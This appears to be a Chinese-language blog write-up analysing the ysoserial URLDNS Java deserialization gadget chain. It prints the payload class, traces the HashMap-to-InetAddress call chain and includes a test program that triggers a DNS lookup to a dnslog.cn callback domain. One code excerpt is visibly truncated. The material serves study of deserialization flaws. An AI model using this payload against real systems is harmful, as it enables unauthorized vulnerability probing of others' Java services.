URLDNS Payload 不依赖任何的第三方库 , 通过HashMap类的反序列化可以触发DNS查询
先看代码:
public class URLDNS implements ObjectPayload {
public Object getObject(final String url) throws Exception {
//Avoid DNS resolution during payload creation
//Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
URLStreamHandler handler = new SilentURLStreamHandler();
HashMap ht = new HashMap(); // HashMap that will contain the URL
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
return ht;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(URLDNS.class, args);
}
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
}
参数设置:
运行主函数
验证成功
看到 URLDNS 类的 getObject ⽅法,ysoserial会调⽤这个⽅法获得Payload。这个⽅法返回的是⼀个对
象,这个对象就是最后将被序列化的对象,在这⾥是 HashMap 。
类方法声明了反序列化方法private void readObject(java.io.ObjectInputStream s),这是我们的入口方法
java/util/HashMap.java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
// Read in the threshold (ignored), loadfactor, and any hidden stuff
s.defaultReadObject();
reinitialize();
if (loadFactor readObject()
2. HashMap->hash()
3. URL->hashCode()
4. URLStreamHandler->hashCode()
5. URLStreamHandler->getHostAddress()
6. InetAddress->getByName()
该链的入口为hash方法,我们发现在HashMap类中的put方法当中就调用了该方法。
public V put(K key, V value) {
return putVal(hash(key), key, value, false, true);
}
也就是说当我们简单调用put方法就会触发URLDNS链,验证一下
import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;
public class URLDNS {
public static void main(String[] args) throws MalformedURLException {
HashMap ht = new HashMap();
String url = "http://clnlld.dnslog.cn/";
URL u = new URL(url);
ht.put(u,url);
}
}
注意到Ysoserial里面的URLDNS多了一部分
URLStreamHandler handler = new SilentURLStreamHandler();
根据调用链,最后会调用handler的getHostAddress方法。Ysoserial创建了一个URLStreamHandler的子类:SilentURLStreamHandler,该类重写了getHostAddress()方法,防止put的触发。
key.hashCode == -1
-
URL u = new URL(null, url, handler);将 URLStreamHandler 对象作为参数 handler 写入到 URL 实例对象中 , 使得反序列化时
handler.hashCode()会调用URLStreamHandler.hashCode, 进入 POP Chains . -
Reflections.setFieldValue(u, "hashCode", -1);当调用
HashMap.put()方法后 , key 的 HashMap 值肯定会发生变化 , 而要想执行 POP Chains , 就必须使得key.hashCode == -1. 这里通过Reflections.setFieldValue()方法将key.hashCode强制转为-1.
文章参考:
https://blog.csdn.net/Xxy605/article/details/121288365
https://ego00.blog.csdn.net/article/details/119678492
https://y4tacker.blog.csdn.net/article/details/117235572
https://www.guildhab.top/2020/08/java-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e6-%e8%a7%a3%e5%af%86-ysoserial-urldns-pop-chain/
